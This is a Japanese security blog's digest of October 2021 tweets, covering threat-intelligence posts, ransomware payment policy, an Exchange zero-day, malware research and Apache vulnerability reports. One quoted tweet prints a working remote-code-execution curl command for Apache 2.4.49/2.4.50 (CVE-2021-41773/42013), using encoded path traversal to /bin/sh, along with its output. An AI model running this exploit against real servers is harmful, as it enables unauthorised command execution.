2021/10/18 セキュリティ関連Twitterメモ
弊社、実はひっそりとエンジニアブログを始めてました! 導入編では、サイバー脅威インテリジェンスとは何か?からどんな環境を準備すればいいのかを紹介してます。 今日からできるサイバー脅威インテリジェンスの話-導入編- - NFLabs. エンジニアブログ https://t.co/mPfh4tmIYs
— ほよたか (@takahoyo) Oct 3, 2021
自作EDR、良いですね。 Windows Kernelの知識を深めたい人は読むべし https://t.co/KT05fdgB1J
— daem0nc0re (@daem0nc0re) Oct 5, 2021
ランサムウェアに対する身代金支払い: 影響を考慮して、禁止の悪影響を軽減するために政府が考慮すべき事項 - 時系列 - 禁止事項 - 被害者保護と支援 https://t.co/XLnkJVCzSE ここでも「禁止」は行動を水面下に追いやるという議論になるのだなあ。 #yuzawaws
— 伊藤 彰嗣 / Akitsugu Ito (@springmoon6) Oct 8, 2021
脆弱性の修正が不十分だった今回の問題は、IIJ の SOC メンバーが(も)発見し報告しました。GJ! Apache HTTP Server 2.4.50におけるパストラバーサル脆弱性(CVE-2021-42013)の発見 ? wizSafe Security Signal -安心・安全への道標- IIJ https://t.co/z3qYGt3Bbe
— Masafumi Negishi (@MasafumiNegishi) Oct 8, 2021
RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013): root@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id' uid=1(daemon) gid=1(daemon) groups=1(daemon)
— ? Roman Medina-Heigl Hernandez (@roman_soft) Oct 7, 2021
ブログで「標的型攻撃グループBlackTechが使用するマルウェアFlagproについて」を公開しました。 https://t.co/RmUJCB9edd
— NTT Ltd. Japanese (@GlobalNTT_JP) Oct 8, 2021
IoT機器、脆弱性放置12万台 サイバー攻撃の恐れ: 日本経済新聞 https://t.co/uGk9LOlB2Z
— piyokango (@piyokango) Oct 9, 2021
社内CTFで出題した問題 | 調査研究/ブログ | 三井物産セキュアディレクション株式会社 https://t.co/bu5vbiXU6T 大和セキュリティの時は他の問題やってて手つけられなかったけど、暗号化されたパスワードの鍵が同じファイルに書かれていて、それを使ってパスワードを復号する問題だったのか
— ほよたか (@takahoyo) Oct 10, 2021
ブログ書いた。 https://t.co/a95C9cq3vC
— defenceability (@defenceability) Oct 12, 2021
東京大学管理のHPCI機材への不正アクセスについて 東京大学情報基盤センター 2021年10月15日 https://t.co/VHkPM3q4F8
— piyokango (@piyokango) Oct 15, 2021
「 内閣官房内閣サイバーセキュリティセンター(NISC)は、サイバーセキュリティ対策において参照すべき関係法令をQ&A形式で解説する「サイバーセキュリティ関係法令Q&Aハンドブック」…を作成」 「サイバーセキュリティ関係法令Q&Aハンドブック」について https://t.co/Ths6QKrVof
— Takuji Hashizume (@takujihashizume) Oct 15, 2021
先日修正された脆弱性とは別のゼロデイがExchange Serverに。 https://t.co/0WHx0PJB1Y
— Yosuke HASEGAWA (@hasegawayosuke) Oct 16, 2021
<世界サイバー情勢>中国のサイバーセキュリティ会社数は驚異的、71.2万社(2021年9月末。出典:「企査査」レポート)。過去10年のサイバーセキュリティ関連企業の新規設立数の推移は、2020年は爆増で、19.5万社が生まれ、昨対112.7%増。これがどう言う意味かを考えることが大切 https://t.co/wCvPsTDLHN
— ニノミヤ・ヒデキ/二宮英樹(Orient, N&A, CIKF, CEEDSA) (@spike16407200) Oct 16, 2021
「ドナルド・トランプを大統領にしたフェイクニュースネットワークの運営者「ハッカーX」はなぜ今自分の正体を明かしたのか?」 https://t.co/C3WvmNFkHf
— キタきつね (@foxbook) Oct 16, 2021
CTIの目的は外部から得た脅威情報から自組織のリスクを正しく評価し、意思決定者に適切に伝えresilienceを高める態勢を強化すること #転記 - そのため攻撃者の帰属特定は重要でない(事もある) - malware解析によるCTI収集にThreat Pursuit VMやREMnux, Proton VPNがおすすめ https://t.co/tAEJLERL0P
— ken\d|\x (@ken5scal) Oct 17, 2021
「スタバMac」がいよいよ危ない時代が到来? PC画面のテキストを簡単にコピーできる技術に戦慄する声 最近のOCRの精度ってこのレベルになってるんですね。 https://t.co/bIrKpMzw4U
— モグ|セキュリティゼネラリスト (@moneymog) Oct 17, 2021